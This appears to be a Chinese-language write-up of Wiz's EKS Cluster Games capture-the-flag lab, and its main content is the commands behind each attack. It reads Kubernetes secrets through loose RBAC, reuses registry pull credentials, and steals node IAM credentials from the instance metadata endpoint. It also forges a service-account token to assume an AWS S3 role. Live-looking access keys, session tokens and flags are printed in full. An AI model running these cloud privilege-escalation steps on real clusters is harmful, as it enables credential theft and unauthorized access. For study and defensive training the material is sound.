The EKS Cluster Games(WIZ)
1. 前置
1.1. 靶场地址
1.2. 什么是IAM
在 Amazon EKS (Elastic Kubernetes Service) 中,IAM (Identity and Access Management) 是 AWS 的核心服务,用于管理集群、工作节点和 Kubernetes 资源的访问权限。以下是 EKS 中 IAM 的关键作用及配置详解:
1.2.1. AM 在 EKS 中的核心功能
控制 AWS 资源访问权限
- 集群管理权限:决定谁可以创建、删除或配置 EKS 集群(通过 IAM 策略绑定用户/角色)。
- 工作节点(Node)权限:管理 EC2 实例或 Fargate 容器的 AWS 资源访问(如拉取 ECR 镜像、写入 CloudWatch 日志)。
Kubernetes RBAC 集成
- IAM 身份映射到 Kubernetes RBAC:通过
aws-authConfigMap 将 IAM 用户/角色映射到 Kubernetes 的Role或ClusterRole,实现细粒度的 Pod/ServiceAccount 权限控制。
1.3. EKS 的本质:AWS 托管的 Kubernetes
Amazon EKS (Elastic Kubernetes Service) 是 AWS 提供的托管 Kubernetes 服务,与 AWS 生态系统深度集成,旨在简化 Kubernetes 集群的部署、管理和扩展。以下是 EKS 与 AWS 的核心关系及关键集成点:
托管控制平面:AWS 负责管理 Kubernetes 控制平面(如 API Server、etcd、调度器),用户无需自行维护。
基础设施即服务 (IaaS):工作节点(Node)可运行在 AWS EC2 或 AWS Fargate(无服务器容器)上,由用户选择配置。
1.4. 什么是OIDC
OIDC(OpenID Connect) 是一种基于 OAuth 2.0 的身份认证协议,用于验证用户身份并获取用户基本信息(如用户名、邮箱等)。它被广泛用于现代应用的单点登录(SSO)和身份管理,是 云原生(如 Kubernetes、AWS EKS)和 Web 服务 中身份验证的核心技术之一
2. challenge 1
2.1. WP
kubectl auth can-i --list
发现对 secrets 有 list 权限还有 get 权限
kubectl get secrets #列出所有Secret
kubectl get secrets log-rotate -o json #获取详细信息
然后就拿到flag了
base64编码即可获取到flag
2.2. 总结
过于宽松的 RBAC 设置,从 Kuberntes Secret 资源中获取到 flag。
Kubernetes Secret 资源是 Kubernetes 集群中用于存储和管理敏感信息的一种资源类型。它可以用来保存和传递敏感数据,例如API密钥、数据库凭据、证书和密码等。它并不安全,因为 Secret 中的内容仅为base64编码,当有权读取到 Secret,便可以轻易解码得到明文内容。其次,在 Kubernetes 集群中,secret 资源具有特殊性,不仅 get 权限可以获取到 secret 内容,list/watch 权限同样可以获取到 secret 内容。同样,不仅可以利用集群中的RBAC权限获取 secret 资源,当拥有节点的控制权限时,还可以通过文件系统查找 secret 的具体内容。
3. challenge 2
3.1. WP
查看权限
对 secrets 有get ,但是没有list ,所以没法获取到所有secrets的名字
看一下pod
查看pod的具体配置
kubectl get pod database-pod-2c9b3a4e -o yaml
这里获取到了镜像名字,以及私有镜像拉取的秘钥名字,
那么我们就得到了secret的名字
那么利用对secret有get权限 即可获取到对应的内容
kubectl get secret registry-pull-secrets-780bab1d -o json
解码后获取到了私有仓库的账号密码
eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
利用账号密码登录到 crane(容器镜像管理工具)
root@wiz-eks-challenge:~# crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
2025/04/18 08:47:19 logged in via /home/user/.docker/config.json
使用 crane 拉取镜像(也就是上面 pod 中使用的)
因为我们当前只知道这一个私有镜像的名字
crane pull eksclustergames/base_ext_image /tmp/image.tar
cd /tmp && tar xvf image.tar
Tip
这里我报错了。因为这线程太少了,配置太低了。拉不了
解压后就可以看到镜像的每一层layer
继续解压,在其中一个里面获取到flag
wiz_eks_challenge{nothing_can_be_said_to_be_certain_except_death_taxes_and_the_exisitense_of_misconfigured_imagepullsecret}
3.2. 总结
容器镜像拉取密钥管理不当,从容器注册表中获取flag。
在真实业务场景中,业务集群有大量节点,节点为了保证pod的正常运行,会从远端容器注册表拉取私有镜像。为了保护私有镜像的安全,防止供应链攻击,容器注册表往往会有认证和授权机制。而pod用以访问容器注册表的凭据则可能存储在Secret资源中。
4. challenge 3
4.1. wp
看下权限
可以 get list pod
查看pod 与pod的配置详细信息,但是没有找到什么有用的信息
提示我们去元数据获取信息
这个是AWS的云服务,看这里 7.k8s-恶意pod构建与利用
curl 169.254.169.254/latest/meta-data
发现其 iam 接口,继续访问,可获得临时凭据,
获取到了endpoint
root@wiz-eks-challenge:~# curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole | jq .
{
"AccessKeyId": "ASIA2AVYNEVMYLCQCU7U",
"Expiration": "2025-04-18 10:10:02+00:00",
"SecretAccessKey": "vCftEz307ekr7u4yx+Tgky0rdpIp4O3RmzXGBZxO",
"SessionToken": "FwoGZXIvYXdzEPv//////////wEaDFfYDWOmi/QeCDns2yK3ASa8TJ6LhMrk8WGz/S6AZ1ckFIQhFsERrU2Zx90rWyUlCSyc7p6n2JvsmRyah6ZSqxCdRtDk1ugppgc/+tU278MXwYyftGxCf+AK5KXb0eDepX8aZJMgYRPNu4FfB1BsrJOhRzx3yiBKX3F6/HBa5n4KAl+vMXDyO+yRM90ivPdxqm0iN3MHJ4OsnosJKZPHNiIK/6rTM66oqhj5OjtyMljDW/82cAsodwPOfZ2eHiEHcWGI6BR+oSjqrYjABjItaStJIUc+dzR645Jktbc7YEE412EscQTfya2drECtGKg5O6ZFfW8qDuxXd83k"
}
把这个凭证导入环境变量
export AWS_ACCESS_KEY_ID="ASIA2AVYNEVMYLCQCU7U"
export AWS_SECRET_ACCESS_KEY="vCftEz307ekr7u4yx+Tgky0rdpIp4O3RmzXGBZxO"
export AWS_SESSION_TOKEN="FwoGZXIvYXdzEPv//////////wEaDFfYDWOmi/QeCDns2yK3ASa8TJ6LhMrk8WGz/S6AZ1ckFIQhFsERrU2Zx90rWyUlCSyc7p6n2JvsmRyah6ZSqxCdRtDk1ugppgc/+tU278MXwYyftGxCf+AK5KXb0eDepX8aZJMgYRPNu4FfB1BsrJOhRzx3yiBKX3F6/HBa5n4KAl+vMXDyO+yRM90ivPdxqm0iN3MHJ4OsnosJKZPHNiIK/6rTM66oqhj5OjtyMljDW/82cAsodwPOfZ2eHiEHcWGI6BR+oSjqrYjABjItaStJIUc+dzR645Jktbc7YEE412EscQTfya2drECtGKg5O6ZFfW8qDuxXd83k"
查看是否导入成功
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}
这可能就是这个节点上使用的IAM角色
获取一下ecr令牌
aws ecr get-login-password | crane auth login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
使用 crane config 命令查看镜像层信息
aws ecr get-login-password|crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS --password-stdin
又是线程数量太少报错了
成功后对远程镜像进行解析即可获取到flag
crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01
4.2. 总结
访问元数据无限制,题目2和3的场景均涉及到镜像层的风险利用。镜像层结构是Docker镜像的核心概念之一,它采用了分层的方式来构建和管理镜像。每个镜像都由多个只读的镜像层组成,每个层都包含了文件系统的一部分和相关的元数据。这种分层结构使得镜像的构建、共享和更新更加高效和灵活。和代码仓库commmit信息泄露类似,如果在镜像构建的过程中意外将敏感信息包含进来,可能会存在信息泄露的风险。通过docker histoty命令可以镜像构建过程中的信息。
5. challenge 4
5.1. WP
先看权限
啥都没有
在看一下在 aws中当前用户是谁
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0cb922c6673973282",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282"
}
这里会返回一个 ARN
可以总结一下
arn:partition:service:region:account-id:resource-type/resource-id
arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282
partition: aws
service: sts
region:
account-id: 688655246681
resource-type: assumed-role
resource-id: eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0cb922c6673973282
cluster-name: eks-challenge-cluster
获取一下token
root@wiz-eks-challenge:~# aws eks get-token --cluster-name eks-challenge-cluster
{
"kind": "ExecCredential",
"apiVersion": "client.authentication.k8s.io/v1beta1",
"spec": {},
"status": {
"expirationTimestamp": "2025-04-18T12:05:08Z",
"token": "k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vP0FjdGlvbj1HZXRDYWxsZXJJZGVudGl0eSZWZXJzaW9uPTIwMTEtMDYtMTUmWC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BU0lBMkFWWU5FVk1WWk9PUE1USSUyRjIwMjUwNDE4JTJGdXMtd2VzdC0xJTJGc3RzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNTA0MThUMTE1MTA4WiZYLUFtei1FeHBpcmVzPTYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCUzQngtazhzLWF3cy1pZCZYLUFtei1TZWN1cml0eS1Ub2tlbj1Gd29HWlhJdllYZHpFUDMlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkZ3RWFEQVpFWiUyRjVqOXNMU0xWZHpaQ0szQWNpWDhkdzRGNGdaeUo0YUE1Y2tIR2xtQ0NtY0wxNWtaWnM3TjI2ZEZNVmRDRFhoT2JYVXdEYndFWm05elczYnJlZlE5YWNsZHdiMDdYbTI0dU10RnVJTVBIOGZDWWp1U3RPejlscXNUODd5UE1vZTFSc25nY3ZCMEN0bGhJYVZiJTJCSmJ1Q1pJa1pSU2duWFIwJTJGV2lhZjNqU0Y3aiUyRnA3ME1ud0VRJTJGeDBrWndCSGdxVjUwZ2FFJTJGWVNYJTJGSGkycVAzcFJFcCUyQkdlck1lQ1N2aDJ6ciUyQlBSNm9teFRVYTFlNnpXbGRZZVMlMkIxVXlZdGRNVTZEaWdvT0F5ano3WWpBQmpJdENDd3lCb08xJTJCUjBwaVZxWUUwaUwwWVJoeFZaQ1dDMCUyRnAwWFB3a2FFNjFZJTJGb2cweGNOQ282UVJlazZLTiZYLUFtei1TaWduYXR1cmU9NmNkZGEwMWYwZmMzZmY2Zjg2ZTc3YjkyYTg5NzRkNTUyN2E2MjI5NDc3NTBiN2NlMGUwNTVjMzgwOGU1ODNiYQ"
}
}
看下这个凭证有什么用
alias kubectl="kubectl --token=k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vP0FjdGlvbj1HZXRDYWxsZXJJZGVudGl0eSZWZXJzaW9uPTIwMTEtMDYtMTUmWC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BU0lBMkFWWU5FVk1WWk9PUE1USSUyRjIwMjUwNDE4JTJGdXMtd2VzdC0xJTJGc3RzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNTA0MThUMTE1MTA4WiZYLUFtei1FeHBpcmVzPTYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCUzQngtazhzLWF3cy1pZCZYLUFtei1TZWN1cml0eS1Ub2tlbj1Gd29HWlhJdllYZHpFUDMlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkZ3RWFEQVpFWiUyRjVqOXNMU0xWZHpaQ0szQWNpWDhkdzRGNGdaeUo0YUE1Y2tIR2xtQ0NtY0wxNWtaWnM3TjI2ZEZNVmRDRFhoT2JYVXdEYndFWm05elczYnJlZlE5YWNsZHdiMDdYbTI0dU10RnVJTVBIOGZDWWp1U3RPejlscXNUODd5UE1vZTFSc25nY3ZCMEN0bGhJYVZiJTJCSmJ1Q1pJa1pSU2duWFIwJTJGV2lhZjNqU0Y3aiUyRnA3ME1ud0VRJTJGeDBrWndCSGdxVjUwZ2FFJTJGWVNYJTJGSGkycVAzcFJFcCUyQkdlck1lQ1N2aDJ6ciUyQlBSNm9teFRVYTFlNnpXbGRZZVMlMkIxVXlZdGRNVTZEaWdvT0F5ano3WWpBQmpJdENDd3lCb08xJTJCUjBwaVZxWUUwaUwwWVJoeFZaQ1dDMCUyRnAwWFB3a2FFNjFZJTJGb2cweGNOQ282UVJlazZLTiZYLUFtei1TaWduYXR1cmU9NmNkZGEwMWYwZmMzZmY2Zjg2ZTc3YjkyYTg5NzRkNTUyN2E2MjI5NDc3NTBiN2NlMGUwNTVjMzgwOGU1ODNiYQ"
root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]
对secrets 有get list
root@wiz-eks-challenge:~# kubectl get secrets -o yaml
apiVersion: v1
items:
- apiVersion: v1
data:
flag: d2l6X2Vrc19jaGFsbGVuZ2V7b25seV9hX3JlYWxfcHJvX2Nhbl9uYXZpZ2F0ZV9JTURTX3RvX0VLU19jb25ncmF0c30=
kind: Secret
metadata:
creationTimestamp: "2023-11-01T12:27:57Z"
name: node-flag
namespace: challenge4
resourceVersion: "883574"
uid: 26461a29-ec72-40e1-adc7-99128ce664f7
type: Opaque
kind: List
metadata:
resourceVersion: ""
wiz_eks_challenge{only_a_real_pro_can_navigate_IMDS_to_EKS_congrats}
5.2. 总结
节点的 IAM 角色的权限过多。
6. challenge5
6.1. WP
看权限
root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]
发现对secrets有 get list 权限
但是这里却列不出机密
root@wiz-eks-challenge:~# kubectl get secrets
error: You must be logged in to the server (Unauthorized)
尝试列出 pod node SA等其他资源,发现都不可以
这里只能创建 serviceaccount 名字为 debug-sa 的 token
apiVersion: v1
items:
- apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
description: This is a dummy service account with empty policy attached
eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
creationTimestamp: "2023-10-31T20:07:37Z"
name: debug-sa
# kubectl create token --serviceaccount debug-sa
namespace: challenge5
resourceVersion: "671929"
uid: 6cb6024a-c4da-47a9-9050-59c8c7079904
- apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
# 需要模拟的对应的 Role 权限 IAM
eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
creationTimestamp: "2023-10-31T20:07:34Z"
name: s3access-sa
namespace: challenge5
resourceVersion: "671916"
uid: 86e44c49-b05a-4ebe-800b-45183a6ebbda
kind: List
metadata:
resourceVersion: ""
在正常情况下,我们是无法使用 kubectl create token 直接生成的 k8s service account 令牌访问 aws(无 audience)
这里会用到一个OIDC服务
Info
AWS的OpenID Connect (OIDC) 是一种身份验证协议,它允许您使用第三方身份提供商(如 Google、Facebook 或企业身份系统)来认证用户。在AWS中,您可以创建一个OIDC身份提供商,然后利用这个提供商来授予AWS资源的访问权限。
然后我们利用OIDC服务去创建一个AWS的令牌
我们先创建一个名为 debug-sa 的 ServiceAccount 生成令牌
root@wiz-eks-challenge:~# kubectl create token debug-sa
eyJhbGciOiJSUzI1NiIsImtpZCI6IjBmZTg2ZjE4MjViYThmMWUyMmE0YjE3ZWQ2MjdlNjRlY2M1ZTI2ZTIifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjIl0sImV4cCI6MTc0NTA2MDQzNywiaWF0IjoxNzQ1MDU2ODM3LCJpc3MiOiJodHRwczovL29pZGMuZWtzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2lkL0MwNjJDMjA3QzhGNTBERTRFQzI0QTM3MkZGNjBFNTg5Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJjaGFsbGVuZ2U1Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlYnVnLXNhIiwidWlkIjoiNmNiNjAyNGEtYzRkYS00N2E5LTkwNTAtNTljOGM3MDc5OTA0In19LCJuYmYiOjE3NDUwNTY4MzcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjaGFsbGVuZ2U1OmRlYnVnLXNhIn0.o6Abm0l0aZcFnejNZK-QR2v4FA7fmWsU1Vir7_x4IL09Eo1zBp4o8gJ-djogQ4Q1tUCSWqU_auLfjDPk9c6UowHl7gKp131K5GLgW2Dqw2QhAuYPX8BvVHdC2gqU_0v8PqsbW79zvK5xvo7w4p7kMvRxOsWn9_UBnfw1tkLrf-LP7AsuX21TWYtByIlf51AGH9vLkMBlXmfK2pTj0hRwV36a4FrJmhOG5l5cRU4ONxgbx247S9OPFqDic4l49fAt8i1tGrDJ1VHT0xeoktJoy7JNfyvfJ-enkz4C8yadfhkFzKkWsh0bo4mhkORONyCAi2_boZkiX9x8qH1olBlrEg
对这个令牌用Jwt解密一下
发现这个创建的令牌具有OIDC权限
但是我们创建的这个token不能用于AWS,需要加上认证字段 --audience=kubernetes.default.svc
重新生成一个TOKEN
root@wiz-eks-challenge:~# kubectl create token debug-sa --audience sts.amazonaws.com
eyJhbGciOiJSUzI1NiIsImtpZCI6IjBmZTg2ZjE4MjViYThmMWUyMmE0YjE3ZWQ2MjdlNjRlY2M1ZTI2ZTIifQ.eyJhdWQiOlsic3RzLmFtYXpvbmF3cy5jb20iXSwiZXhwIjoxNzQ1MDYxMzI1LCJpYXQiOjE3NDUwNTc3MjUsImlzcyI6Imh0dHBzOi8vb2lkYy5la3MudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vaWQvQzA2MkMyMDdDOEY1MERFNEVDMjRBMzcyRkY2MEU1ODkiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImNoYWxsZW5nZTUiLCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVidWctc2EiLCJ1aWQiOiI2Y2I2MDI0YS1jNGRhLTQ3YTktOTA1MC01OWM4YzcwNzk5MDQifX0sIm5iZiI6MTc0NTA1NzcyNSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmNoYWxsZW5nZTU6ZGVidWctc2EifQ.HfjddHBT-26LqmaeUMYlr63MhLwvaVie_cVQdCOeBJwozomHnXPJYw9GOrOascpXocAeD6iWLvS1iQ0wuKwdNPy04DEP2M6eTa4kfNieeS1WxvDpIj587h3lg13ggBa1TpvmDUbtXJUj-jL-Q4VSCht70eXNnQDmC--5poGY88RX9XiousImJsjBbFGEioydO64gCo0OogltJ5oMWgtt_BwwnkDSCOutKG9kraodaRVpqCy4Ed2HcoHb90u_9JfrrITcfP0Y74wpwbfbyPOXCLUdGKN7Fkrp17xM9nVLAjD2f6zuljEH2eMGW09Wm_niYs2OcEKqLNMawihFyRXVqQ
如果报错就刷新网页,重新试一下
解码看看
这里aud指的就是Audience 即令牌的接受者,可以看到这里已经变成了sts.amazonaws.com即AWS STS服务
解决了 aws token 的问题,下一步就是模拟IAM权限了
root@wiz-eks-challenge:~# aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name sessionABC --web-identity-token eyJhbGciOiJSUzI1NiIsImtpZCI6IjBmZTg2ZjE4MjViYThmMWUyMmE0YjE3ZWQ2MjdlNjRlY2M1ZTI2ZTIifQ.eyJhdWQiOlsic3RzLmFtYXpvbmF3cy5jb20iXSwiZXhwIjoxNzQ1MDYxMzI1LCJpYXQiOjE3NDUwNTc3MjUsImlzcyI6Imh0dHBzOi8vb2lkYy5la3MudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vaWQvQzA2MkMyMDdDOEY1MERFNEVDMjRBMzcyRkY2MEU1ODkiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImNoYWxsZW5nZTUiLCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVidWctc2EiLCJ1aWQiOiI2Y2I2MDI0YS1jNGRhLTQ3YTktOTA1MC01OWM4YzcwNzk5MDQifX0sIm5iZiI6MTc0NTA1NzcyNSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmNoYWxsZW5nZTU6ZGVidWctc2EifQ.HfjddHBT-26LqmaeUMYlr63MhLwvaVie_cVQdCOeBJwozomHnXPJYw9GOrOascpXocAeD6iWLvS1iQ0wuKwdNPy04DEP2M6eTa4kfNieeS1WxvDpIj587h3lg13ggBa1TpvmDUbtXJUj-jL-Q4VSCht70eXNnQDmC--5poGY88RX9XiousImJsjBbFGEioydO64gCo0OogltJ5oMWgtt_BwwnkDSCOutKG9kraodaRVpqCy4Ed2HcoHb90u_9JfrrITcfP0Y74wpwbfbyPOXCLUdGKN7Fkrp17xM9nVLAjD2f6zuljEH2eMGW09Wm_niYs2OcEKqLNMawihFyRXVqQ
{
"Credentials": {
"AccessKeyId": "ASIA2AVYNEVM6PL33GGR",
"SecretAccessKey": "o+/o8fIJn9JAf1VjxrJ9jMMC/CGdZJyskK8NKhz5",
"SessionToken": "IQoJb3JpZ2luX2VjEAMaCXVzLXdlc3QtMSJHMEUCIQDtxzKWr4Yr8yYJD0Gcnzhqx5caWyMcY2V4YxMMSJUY+wIgV96anwVb34zgn8aBxDsqqT0pA6AydFrzOl7/gpTvFMEqxAQIi///////////ARABGgw2ODg2NTUyNDY2ODEiDPhGHdWIUcrg8gXctiqYBBPAnQMmgYKk+hgrDIlF524CQI+l+LYfMJIn/XKNtU5FIu0O/lOSH2F342Vxn/GIwvZ2AOuc9nmdRQQaeBvI72n2sC1scHwxbVoq9t5+xbmk47VYCsAei//byXbF0PcqfuapLaQcYhx5FSss2vzgRVzn1Mx42uo8aPXTcy5HRnNkBqg877h23N8/UqfCu1ofBelpUr9pI6bnSPWxJ81Zft9YAyllnVdhxlUeb1Bp/syFvuYnnXdILtK3K2gHlkD17VqWtUG3C00oeWz9LGV9vBrjL7WfChAHB/6T//WiFtHRVdSB/2dZUzPy6JSLbZgo3nBxYS/3uoyt1jdfcNZdyKpj6rs6U9DIXmjdYb+Nppe6l1Z93BIir0bq4pIgL3SJeunlJX1VE9GfbbVQUmDuJmZ1wluOfZHo1cNUMOj6AlCv54w17QRRuAQcX2a3Df1IigXWuXoBZNzzDJN9DVp2NmWBIsUdyMavMTdN1tdxjGc9Ty9h1N5NOYTlgafT51y7vaIpsfb7PIID8C6e01JyBGbQnyOPfGcRf+kRhDxmcZFAHd1vMeT7iyxGGKs4clXBwbSq1YBwnPUFeHxfJO4b78+fMJeMUQI/IpgHHbbmwkeFET6j/nIqy4g9JPltifmAzaiLJmtBZSDb4bYD3h5yqUX0Ak22w2jHUsjgcBgZKTCLdNfRFBY+IFil7DhUG02obVKnvsMHVnKZMOjxjcAGOpUBPyjOR8nSdDrvY3sUzclZLxhvFH4UoegcXHoMLODqIZRw1ZnFB7U1IM+w24K1b2+iszdneuGRGm61yfRhmosTvtxVIURV1qy8F7B+k3wzGehuLhHCtQ+bdicH/n/6jruY/hylL0+GrW6E2K2hEOD2rvyrF+nH/G/fmNE1Uzhe+16lSSYvMBD8nr0r1geXhtWG8DUQb4Y=",
"Expiration": "2025-04-19T11:20:24+00:00"
},
"SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
"AssumedRoleUser": {
"AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:sessionABC",
"Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/sessionABC"
},
"Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
"Audience": "sts.amazonaws.com"
}
688655246681 是AWS 的账号ID 可以通过命令
aws sts get-caller-identity --query "Account"查看
然后导入环境变量即可
root@wiz-eks-challenge:~# export AWS_ACCESS_KEY_ID=ASIA2AVYNEVM6PL33GGR
root@wiz-eks-challenge:~# export AWS_SECRET_ACCESS_KEY=o+/o8fIJn9JAf1VjxrJ9jMMC/CGdZJyskK8NKhz5
root@wiz-eks-challenge:~# export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEAMaCXVzLXdlc3QtMSJHMEUCIQDtxzKWr4Yr8yYJD0Gcnzhqx5caWyMcY2V4YxMMSJUY+wIgV96anwVb34zgn8aBxDsqqT0pA6AydFrzOl7/gpTvFMEqxAQIi///////////ARABGgw2ODg2NTUyNDY2ODEiDPhGHdWIUcrg8gXctiqYBBPAnQMmgYKk+hgrDIlF524CQI+l+LYfMJIn/XKNtU5FIu0O/lOSH2F342Vxn/GIwvZ2AOuc9nmdRQQaeBvI72n2sC1scHwxbVoq9t5+xbmk47VYCsAei//byXbF0PcqfuapLaQcYhx5FSss2vzgRVzn1Mx42uo8aPXTcy5HRnNkBqg877h23N8/UqfCu1ofBelpUr9pI6bnSPWxJ81Zft9YAyllnVdhxlUeb1Bp/syFvuYnnXdILtK3K2gHlkD17VqWtUG3C00oeWz9LGV9vBrjL7WfChAHB/6T//WiFtHRVdSB/2dZUzPy6JSLbZgo3nBxYS/3uoyt1jdfcNZdyKpj6rs6U9DIXmjdYb+Nppe6l1Z93BIir0bq4pIgL3SJeunlJX1VE9GfbbVQUmDuJmZ1wluOfZHo1cNUMOj6AlCv54w17QRRuAQcX2a3Df1IigXWuXoBZNzzDJN9DVp2NmWBIsUdyMavMTdN1tdxjGc9Ty9h1N5NOYTlgafT51y7vaIpsfb7PIID8C6e01JyBGbQnyOPfGcRf+kRhDxmcZFAHd1vMeT7iyxGGKs4clXBwbSq1YBwnPUFeHxfJO4b78+fMJeMUQI/IpgHHbbmwkeFET6j/nIqy4g9JPltifmAzaiLJmtBZSDb4bYD3h5yqUX0Ak22w2jHUsjgcBgZKTCLdNfRFBY+IFil7DhUG02obVKnvsMHVnKZMOjxjcAGOpUBPyjOR8nSdDrvY3sUzclZLxhvFH4UoegcXHoMLODqIZRw1ZnFB7U1IM+w24K1b2+iszdneuGRGm61yfRhmosTvtxVIURV1qy8F7B+k3wzGehuLhHCtQ+bdicH/n/6jruY/hylL0+GrW6E2K2hEOD2rvyrF+nH/G/fmNE1Uzhe+16lSSYvMBD8nr0r1geXhtWG8DUQb4Y=
然后拷贝flag即可
root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag /tmp/flag
download: s3://challenge-flag-bucket-3ff1ae2/flag to ../../tmp/flag
root@wiz-eks-challenge:~# cd /tmp
root@wiz-eks-challenge:/tmp# ls
flag
root@wiz-eks-challenge:/tmp# cat flag
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}
感觉知识点还是太多了。做起来云里雾里的。太多知识点都是第一次接触